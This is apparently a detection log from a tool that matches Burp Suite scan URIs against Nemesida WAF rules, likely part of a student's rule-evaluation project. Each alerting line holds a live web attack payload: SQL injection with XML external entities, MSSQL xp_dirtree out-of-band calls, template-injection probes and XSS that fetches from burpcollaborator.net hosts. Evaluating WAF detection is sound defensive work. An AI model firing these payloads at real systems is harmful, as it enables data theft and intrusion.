# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l burpsuite.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/web_estatica/owasp/comerciales/burpsuite/burpsuite.clean
Packet [28]	Uri [/robots.txt?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nlhyj%20SYSTEM%20%22http%3a%2f%2fzadrib7ow69tdlfmoyjopwlif9l49vxyls8iw7.burpcollab'%7c%7c'orator.net%2f%22%3e%25nlhyj%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [10]	Signatures	[300000034]	[300000051]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300002405]	[300002745]
Packet [30]	Uri [/robots.txt?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nlhyj%20SYSTEM%20%22http%3a%2f%2fw63oe83ls35q9ibjkvfllthfb6h15stwhq4gs5.burpcollab'%7c%7c'orator.net%2f%22%3e%25nlhyj%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [11]	Signatures	[300000034]	[300000051]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300001085]	[300002405]	[300002745]
Packet [31]	Uri [/robots.txt?1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c8py0xkmxbfo2suuv37yx450rui0do4cv2jw6mub.burpcollab'%2b'orator.net%5cmmp'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [7]	Signatures	[300000051]	[300000052]	[300000066]	[300000068]	[300001012]	[300001094]	[300001491]
Packet [34]	Uri [/robots.txt?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20mlpxf%20SYSTEM%20%22http%3a%2f%2fni9fqzfc4uhhl9nawmrcxkt6nxtshj5mtgg64v.burpcollab'%7c%7c'orator.net%2f%22%3e%25mlpxf%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [9]	Signatures	[300000034]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300002405]	[300002745]
Packet [42]	Uri [/web?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nmcxu%20SYSTEM%20%22http%3a%2f%2f2hkupeer39gwkompv1qrwzslmcs7gx40sufk39.burpcollab'%7c%7c'orator.net%2f%22%3e%25nmcxu%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [10]	Signatures	[300000034]	[300000051]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300002405]	[300002745]
Packet [44]	Uri [/web/?(select%20extractvalue(xmltype(%27%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nmcxu%20SYSTEM%20%22http%3a%2f%2f2hkupeer39gwkompv1qrwzslmcs7gx40sufk39.burpcollab%27%7c%7c%27orator.net%2f%22%3e%25nmcxu%3b]%3e%27)%2c%27%2fl%27)%20from%20dual)=1]	Nattacks [10]	Signatures	[300000034]	[300000051]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300002405]	[300002745]
Packet [45]	Uri [/web?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20nmcxu%20SYSTEM%20%22http%3a%2f%2fr5xjd32gry4l8daejqegkogaa1gw4msqgk3arz.burpcollab'%7c%7c'orator.net%2f%22%3e%25nmcxu%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [11]	Signatures	[300000034]	[300000051]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300001085]	[300002405]	[300002745]
Packet [51]	Uri [/web?owubh$%7b509*110%7dw453h=1]	Nattacks [2]	Signatures	[300000037]	[300002799]
Packet [52]	Uri [/web/?owubh$%7b509*110%7dw453h=1]	Nattacks [2]	Signatures	[300000037]	[300002799]
Packet [57]	Uri [/web?rg0th%7b%7b102*568%7d%7dx6817=1]	Nattacks [1]	Signatures	[300000035]
Packet [58]	Uri [/web/?rg0th%7b%7b102*568%7d%7dx6817=1]	Nattacks [1]	Signatures	[300000035]
Packet [60]	Uri [/web?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20oqssf%20SYSTEM%20%22http%3a%2f%2f86c0ek3xsf529ubvk7fxl5hrbihd53t6h04qsf.burpcollab'%7c%7c'orator.net%2f%22%3e%25oqssf%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [10]	Signatures	[300000034]	[300000051]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300002405]	[300002745]
Packet [61]	Uri [/web/?(select%20extractvalue(xmltype(%27%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20oqssf%20SYSTEM%20%22http%3a%2f%2f86c0ek3xsf529ubvk7fxl5hrbihd53t6h04qsf.burpcollab%27%7c%7c%27orator.net%2f%22%3e%25oqssf%3b]%3e%27)%2c%27%2fl%27)%20from%20dual)=1]	Nattacks [10]	Signatures	[300000034]	[300000051]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300002405]	[300002745]
Packet [62]	Uri [/web?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20oqssf%20SYSTEM%20%22http%3a%2f%2fif1anuc71peci4k5tho7ufq1ksqned2hqbd11q.burpcollab'%7c%7c'orator.net%2f%22%3e%25oqssf%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [11]	Signatures	[300000034]	[300000051]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300001085]	[300002405]	[300002745]
Packet [63]	Uri [/web/?1%27%7c%7c(select%20extractvalue(xmltype(%27%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20oqssf%20SYSTEM%20%22http%3a%2f%2fif1anuc71peci4k5tho7ufq1ksqned2hqbd11q.burpcollab%27%7c%7c%27orator.net%2f%22%3e%25oqssf%3b]%3e%27)%2c%27%2fl%27)%20from%20dual)%7c%7c%27=1]	Nattacks [11]	Signatures	[300000034]	[300000051]	[300000052]	[300000053]	[300001007]	[300001021]	[300001023]	[300001027]	[300001085]	[300002405]	[300002745]
Packet [64]	Uri [/web?1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cxklps9hm64jrnjpkywtmzuvgp7v2js7jx7ruhi6.burpcollab'%2b'orator.net%5ctoy'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [7]	Signatures	[300000051]	[300000052]	[300000066]	[300000068]	[300001012]	[300001094]	[300001491]
Packet [100]	Uri [@7x5z5juwjew10t2ub66wc48q2h8cw2kupif55tu.burpcollaborator.net/]	Nattacks [1]	Signatures	[300001322]
Packet [101]	Uri [@wzzo78wll3yq2i4jdv8letaf46a1ytmlr9hw7kw.burpcollaborator.net/]	Nattacks [1]	Signatures	[300001322]
Packet [102]	Uri [/413w9gytnb0y4q6rf3atg1cn6ec90zorsfi28qx.burpcollaborator.net/]	Nattacks [1]	Signatures	[300001322]
Packet [103]	Uri [@gtd81sq5fnsaw2y37f258d4zyq4lscg4lsbf13q.burpcollaborator.net/]	Nattacks [1]	Signatures	[300001322]
Packet [104]	Uri [/w85og85lu37qbidjmvhlntjfd6j17tvlz9pwfk4.burpcollaborator.net/]	Nattacks [1]	Signatures	[300001322]
Packet [106]	Uri [/iqcayun7cppct4v54hz75f11vs1nped6hu7hx5m.burpcollaborator.net/]	Nattacks [1]	Signatures	[300001322]
Packet [112]	Uri [rxsj53ugjywl0d2ebq6gco8a218wwnkgb41rrfg.burpcollaborator.net:443]	Nattacks [1]	Signatures	[300001322]
Packet [124]	Uri [0fgsnccp17euimkntzopuxqjkaq5ev2otcjz9ny.burpcollaborator.net:443]	Nattacks [1]	Signatures	[300001322]
Packet [235]	Uri [/'%22%3e%3csvg/onload%3dfetch%60//hj49rtg65oibm3o4xgs6yeu0orumic64wsnkaayz%5c.burpcollaborator.net%60%3e]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300001322]
Packet [236]	Uri [/javascript%3a/*%3c/script%3e%3cimg/onerror%3d'-/%22/-/%20onmouseover%3d1/-/[%60*/[]/[(new(Image)).src%3d(/%3b/%2b/76bzej3wse519tbuk6fwl4hqbhhc52tukibay0mpX%3b.burpcollaborator.net/).replace(/.%3b/g%2c[])]//'src%3d%3e]	Nattacks [11]	Signatures	[300000039]	[300000040]	[300000051]	[300000052]	[300000502]	[300000515]	[300000528]	[300000532]	[300001130]	[300001322]	[300001882]
Packet [241]	Uri [/robots.txt?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2frpkjx3mgbyolsdue3qyg4o0au10woncf23wqmeb%5c.burpcollaborator.net%60%3e=1]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300001322]
Packet [242]	Uri [/robots.txt?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2f053sdc2pr74u8manjzepkxgjaag54wsojcdz3nsX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [11]	Signatures	[300000039]	[300000040]	[300000051]	[300000052]	[300000502]	[300000515]	[300000528]	[300000532]	[300001130]	[300001322]	[300001882]
Packet [248]	Uri [/web?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fowog40tdivviza1ban5dbl771y7tvjjb9z3mtai%5c.burpcollaborator.net%60%3e=1]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300001322]
Packet [249]	Uri [/web/?%27%22%3e%3csvg%2fonload%3dfetch%60%2f%2fowog40tdivviza1ban5dbl771y7tvjjb9z3mtai%5c.burpcollaborator.net%60%3e=1]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300001322]
Packet [250]	Uri [/web?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fz44rcb1oq63t7l9miydojwfi99f43urmiacx2lrX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [11]	Signatures	[300000039]	[300000040]	[300000051]	[300000052]	[300000502]	[300000515]	[300000528]	[300000532]	[300001130]	[300001322]	[300001882]
# N. packets [254], [31] with alerts, N. Alerts [176]
# Execution time: 0.246661 s
